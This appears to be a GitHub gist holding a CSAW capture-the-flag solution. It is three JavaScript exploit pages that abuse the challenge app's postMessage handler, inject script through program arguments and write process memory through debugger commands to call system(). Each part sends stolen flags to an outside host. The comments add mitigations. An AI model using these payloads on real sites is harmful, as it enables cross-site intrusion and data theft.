
@itszn
Last active November 8, 2019 17:41
Easiest Crackme Solution
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
// Write-up, part 1: a page on a different origin embeds the challenge in an
// iframe (id "a") and drives it only through window.postMessage.
//
// Defender's reading (inferred from the messages sent here; the challenge's
// own message handler is not shown on this page):
//   - the framed app acts on 'start' / 'run' commands posted by whatever page
//     embeds it, so its handler presumably does not compare event.origin or
//     event.source against an allowlist;
//   - nothing stops an arbitrary site from framing the app in the first place.
// Hardening on the receiving side: validate event.origin in the message
// handler and restrict framing (CSP frame-ancestors / X-Frame-Options).

// Request counter: every posted message carries the next id, and replies are
// matched on the id they echo back.
let nextId = 0;

// '*' as targetOrigin delivers the message whatever origin the frame holds.
const post = (message) => a.contentWindow.postMessage(message, '*');

const onFrameReply = (event) => {
  // `msg` is not declared in this snippet, so in a classic script this
  // assignment creates a global; kept as written.
  msg = event.data;
  console.log("attacker got ", msg);

  // Reply to 'start' (id 0): ask the app to run the program.
  if (msg.id == 0) {
    post({ type: 'run', id: nextId++, from: 'page' });
    return;
  }

  // Reply to 'run' (id 1): the program output is forwarded to an external
  // host in a query string. An outbound request like this is what
  // connect-src in a CSP, or egress monitoring, would surface.
  if (msg.id == 1) {
    const reportUrl = "http://itszn.com/?flag=" + msg.output;
    fetch(reportUrl);
  }
};

window.addEventListener("message", onFrameReply);

// Kick off the sequence once the framed app has loaded.
a.onload = () => {
  post({ type: 'start', args: ['web2hard'], id: nextId++, from: 'page' });
};
</script>
<iframe src="http://crackme.web.chal.csaw.io" id="a"></iframe>
<script>
// Write-up, part 2: same cross-origin postMessage driver as part 1, but the
// program argument passed to 'start' is HTML markup instead of a password.
//
// Defender's reading (inferred; the debugger view itself is not on this page):
// the later 'open_debugger' step presumably opens a view that echoes the
// program arguments without output-encoding, so the markup executes in the
// challenge's origin, where it can read the same-origin /flag2.txt and send it
// to another host. Mitigations: HTML-encode arguments wherever they are
// rendered, add a CSP that blocks inline script and restricts connect-src,
// and validate event.origin before acting on posted commands.

// Request counter: replies are matched on the id they echo back.
let nextId = 0;

// '*' as targetOrigin delivers the message whatever origin the frame holds.
const post = (message) => a.contentWindow.postMessage(message, '*');

const onFrameReply = (event) => {
  // `msg` is not declared in this snippet, so in a classic script this
  // assignment creates a global; kept as written.
  msg = event.data;
  console.log("attacker got ", msg);

  // Reply to 'start' (id 0): set a breakpoint so the program stops.
  if (msg.id == 0) {
    post({ type: 'breakpoint', addr: 'main+79', from: 'page', id: nextId++ });
    return;
  }

  // Reply to 'breakpoint' (id 1): run up to that breakpoint.
  if (msg.id == 1) {
    post({ type: 'run', id: nextId++, from: 'page' });
    return;
  }

  // Reply to 'run' (id 2): open the debugger view, which is where the
  // argument markup is presumably rendered.
  if (msg.id == 2) {
    post({ type: 'open_debugger', from: 'page', id: nextId++ });
  }
};

window.addEventListener("message", onFrameReply);

// Kick off the sequence once the framed app has loaded.
a.onload = () => {
  // The closing tag is split ('</' + 'script>') so the HTML parser does not
  // end this script element early.
  const markupArg = '<script>fetch(`/flag2.txt`).then(x=>x.text()).then(x=>fetch(`http://itszn.com/?${x}`))</'+'script>';
  post({ type: 'start', args: [markupArg], id: nextId++, from: 'page' });
};
</script>
<iframe src="http://crackme.web.chal.csaw.io" id="a"></iframe>
<script>
// Write-up, part 3: builds on part 2. The markup passed as a program argument
// now evaluates whatever is base64-encoded in location.hash, and the script to
// evaluate is carried after a '#' appended to the `uid` field of
// 'open_debugger'.
//
// Defender's reading (inferred; none of the challenge's code is on this page):
//   - `uid` is presumably placed into the debugger window's URL unencoded, so
//     a '#' inside it becomes the fragment;
//   - the 'flavor' field of backend messages appears to reach the debugger as
//     a free-form command: below it carries 'follow-fork-mode parent' and
//     expressions of the form *((long*)...)=..., which look like writes to
//     process memory at the current instruction pointer.
// Mitigations: URL-encode the uid and validate its format, HTML-encode
// arguments wherever they are rendered, allowlist 'flavor' values on the
// backend, and check event.origin before acting on posted commands.

// Request counter: replies are matched on the id they echo back.
let nextId = 0;

// Session identifier taken from the reply to 'start'.
let uid = null;

// Script text evaluated inside the debugger view. It is kept byte-for-byte
// because it is base64-encoded at runtime. send_message_to_backend, and the
// `uid` it reads, are resolved in the page that evaluates it, not here.
let debuggerScript = `
(function(){
// Only run once
if (window.ran) return;
send_message_to_backend({type:'flavor',flavor:'follow-fork-mode parent'}).then(x=>{
return send_message_to_backend({
type:'flavor',
flavor:'*((long*)$rip)=0xb848',
uid:uid});
}).then(x=>{
return send_message_to_backend({
type:'flavor',
flavor:'*((long*)($rip+2))=system',
uid:uid});
}).then(x=>{
return send_message_to_backend({
type:'flavor',
flavor:'*((long*)($rip+10))=0xd0ff',
uid:uid});
}).then(x=>{
return send_message_to_backend({
type:'continue',
uid:uid});
}).then(msg=>{
console.log(msg)
fetch('http://itszn.com/?flag='+msg.output);
});
})()
`;

// '*' as targetOrigin delivers the message whatever origin the frame holds.
const post = (message) => a.contentWindow.postMessage(message, '*');

const onFrameReply = (event) => {
  // `msg` is not declared in this snippet, so in a classic script this
  // assignment creates a global; kept as written.
  msg = event.data;
  console.log("attacker got ", msg);

  // Reply to 'start' (id 0): remember the session uid, then set a breakpoint.
  if (msg.id == 0) {
    uid = msg.uid;
    post({ type: 'breakpoint', addr: 'main+79', from: 'page', id: nextId++ });
    return;
  }

  // Reply to 'breakpoint' (id 1): run up to that breakpoint.
  if (msg.id == 1) {
    post({ type: 'run', id: nextId++, from: 'page' });
    return;
  }

  // Reply to 'run' (id 2): open the debugger view with the encoded script
  // appended to the uid after a '#'.
  if (msg.id == 2) {
    const uidWithFragment = uid + '#' + btoa(debuggerScript);
    post({
      type: 'open_debugger',
      from: 'page',
      uid: uidWithFragment,
      id: nextId++,
    });
  }
};

window.addEventListener("message", onFrameReply);

// Kick off the sequence once the framed app has loaded.
a.onload = () => {
  // The closing tag is split ('</' + 'script>') so the HTML parser does not
  // end this script element early. eval() of fragment data is the sink a
  // CSP without 'unsafe-eval' / inline script would block.
  const markupArg = '/flag3.exe #<script>eval(atob(location.hash.slice(1)))</'+'script>';
  post({ type: 'start', args: [markupArg], id: nextId++, from: 'page' });
};
</script>